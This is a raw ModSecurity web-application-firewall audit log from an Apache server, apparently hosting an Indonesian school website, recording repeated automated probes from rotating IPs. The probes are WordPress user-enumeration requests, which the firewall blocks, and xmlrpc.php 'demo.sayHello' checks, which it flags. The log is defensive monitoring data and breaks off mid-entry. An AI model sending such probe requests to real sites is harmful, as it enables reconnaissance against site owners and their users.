aCi4Iem4kjNN-hEbWjLK4gAAAEk 103.236.140.4 35626 103.236.140.4 8181 --76fd393b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.51 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --76fd393b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76fd393b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499041481014 2697 (- - -) Stopwatch2: 1747499041481014 2697; combined=1570, p1=398, p2=1146, p3=0, p4=0, p5=26, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76fd393b-Z-- --f788943d-A-- [17/May/2025:23:24:01 +0700] aCi4IXyxdQCiyU1ENFfIQAAAAA8 103.236.140.4 35624 103.236.140.4 8181 --f788943d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f788943d-C-- demo.sayHello --f788943d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f788943d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499041480305 6449 (- - -) Stopwatch2: 1747499041480305 6449; combined=4830, p1=664, p2=3885, p3=35, p4=78, p5=109, sr=74, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f788943d-Z-- --cba51324-A-- [17/May/2025:23:24:08 +0700] aCi4KATOsBn9MSWb6WL-1gAAAIo 103.236.140.4 36144 103.236.140.4 8181 --cba51324-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.51 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cba51324-C-- demo.sayHello --cba51324-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cba51324-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499048755280 3999 (- - -) Stopwatch2: 1747499048755280 3999; combined=2877, p1=396, p2=2311, p3=26, p4=26, p5=69, sr=48, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cba51324-Z-- --93e2d94d-A-- [17/May/2025:23:24:49 +0700] aCi4UQTOsBn9MSWb6WL_4AAAAJM 103.236.140.4 38966 103.236.140.4 8181 --93e2d94d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --93e2d94d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93e2d94d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499089727127 3688 (- - -) Stopwatch2: 1747499089727127 3688; combined=1961, p1=587, p2=1342, p3=0, p4=0, p5=31, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93e2d94d-Z-- --3b15635f-A-- [17/May/2025:23:24:58 +0700] aCi4WhKi5m5upc8uMd5G0QAAANM 103.236.140.4 39594 103.236.140.4 8181 --3b15635f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b15635f-C-- demo.sayHello --3b15635f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b15635f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499098777393 4922 (- - -) Stopwatch2: 1747499098777393 4922; combined=3547, p1=499, p2=2844, p3=32, p4=31, p5=83, sr=63, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b15635f-Z-- --6bd1104d-A-- [17/May/2025:23:25:10 +0700] aCi4ZgTOsBn9MSWb6WIAPAAAAJM 103.236.140.4 40422 103.236.140.4 8181 --6bd1104d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6bd1104d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bd1104d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499110878361 2136 (- - -) Stopwatch2: 1747499110878361 2136; combined=953, p1=327, p2=604, p3=0, p4=0, p5=22, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bd1104d-Z-- --0b310f33-A-- [17/May/2025:23:25:16 +0700] aCi4bOm4kjNN-hEbWjLMtwAAAE8 103.236.140.4 40804 103.236.140.4 8181 --0b310f33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.186 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0b310f33-C-- demo.sayHello --0b310f33-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b310f33-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499116039745 6252 (- - -) Stopwatch2: 1747499116039745 6252; combined=4633, p1=639, p2=3775, p3=38, p4=40, p5=85, sr=70, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b310f33-Z-- --7acfad08-A-- [17/May/2025:23:25:20 +0700] aCi4cOm4kjNN-hEbWjLM2QAAAEE 103.236.140.4 41118 103.236.140.4 8181 --7acfad08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7acfad08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7acfad08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499120320677 2242 (- - -) Stopwatch2: 1747499120320677 2242; combined=981, p1=335, p2=624, p3=0, p4=0, p5=22, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7acfad08-Z-- --84256f5b-A-- [17/May/2025:23:25:25 +0700] aCi4dRKi5m5upc8uMd5HigAAAMk 103.236.140.4 41476 103.236.140.4 8181 --84256f5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.150 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --84256f5b-C-- demo.sayHello --84256f5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --84256f5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499125929369 4457 (- - -) Stopwatch2: 1747499125929369 4457; combined=3406, p1=443, p2=2773, p3=30, p4=29, p5=78, sr=57, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84256f5b-Z-- --9747b62f-A-- [17/May/2025:23:26:04 +0700] aCi4nHyxdQCiyU1ENFfL5wAAABE 103.236.140.4 44124 103.236.140.4 8181 --9747b62f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9747b62f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9747b62f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499164446690 2604 (- - -) Stopwatch2: 1747499164446690 2604; combined=1114, p1=377, p2=700, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9747b62f-Z-- --bac30c35-A-- [17/May/2025:23:26:08 +0700] aCi4oHyxdQCiyU1ENFfMDgAAAAw 103.236.140.4 44432 103.236.140.4 8181 --bac30c35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bac30c35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bac30c35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499168422205 2590 (- - -) Stopwatch2: 1747499168422205 2590; combined=1415, p1=458, p2=924, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bac30c35-Z-- --319feb3f-A-- [17/May/2025:23:26:11 +0700] aCi4owTOsBn9MSWb6WIBNQAAAJg 103.236.140.4 44632 103.236.140.4 8181 --319feb3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --319feb3f-C-- demo.sayHello --319feb3f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --319feb3f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499171353851 4481 (- - -) Stopwatch2: 1747499171353851 4481; combined=3513, p1=459, p2=2865, p3=28, p4=28, p5=79, sr=61, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --319feb3f-Z-- --c213774a-A-- [17/May/2025:23:26:14 +0700] aCi4pgTOsBn9MSWb6WIBQAAAAJg 103.236.140.4 44826 103.236.140.4 8181 --c213774a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c213774a-C-- demo.sayHello --c213774a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c213774a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499174040482 4907 (- - -) Stopwatch2: 1747499174040482 4907; combined=3572, p1=461, p2=2890, p3=29, p4=35, p5=92, sr=65, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c213774a-Z-- --337dc819-A-- [17/May/2025:23:26:42 +0700] aCi4whKi5m5upc8uMd5J6gAAAMo 103.236.140.4 46708 103.236.140.4 8181 --337dc819-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --337dc819-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --337dc819-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499202378523 2527 (- - -) Stopwatch2: 1747499202378523 2527; combined=1147, p1=376, p2=740, p3=0, p4=0, p5=30, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --337dc819-Z-- --57089d05-A-- [17/May/2025:23:26:50 +0700] aCi4ygTOsBn9MSWb6WIBswAAAJM 103.236.140.4 47288 103.236.140.4 8181 --57089d05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --57089d05-C-- demo.sayHello --57089d05-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57089d05-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747499210926716 5935 (- - -) Stopwatch2: 1747499210926716 5935; combined=4623, p1=632, p2=3747, p3=42, p4=43, p5=96, sr=77, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57089d05-Z-- --36e68e5e-A-- [17/May/2025:23:27:07 +0700] aCi42wTOsBn9MSWb6WICPgAAAJI 103.236.140.4 48442 103.236.140.4 8181 --36e68e5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36e68e5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36e68e5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499227460095 3463 (- - -) Stopwatch2: 1747499227460095 3463; combined=1884, p1=536, p2=1262, p3=0, p4=0, p5=85, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36e68e5e-Z-- --85f03940-A-- [17/May/2025:23:27:17 +0700] aCi45RKi5m5upc8uMd5K6AAAAMA 103.236.140.4 49130 103.236.140.4 8181 --85f03940-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --85f03940-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85f03940-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747499237296759 2857 (- - -) Stopwatch2: 1747499237296759 2857; combined=1254, p1=441, p2=786, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: 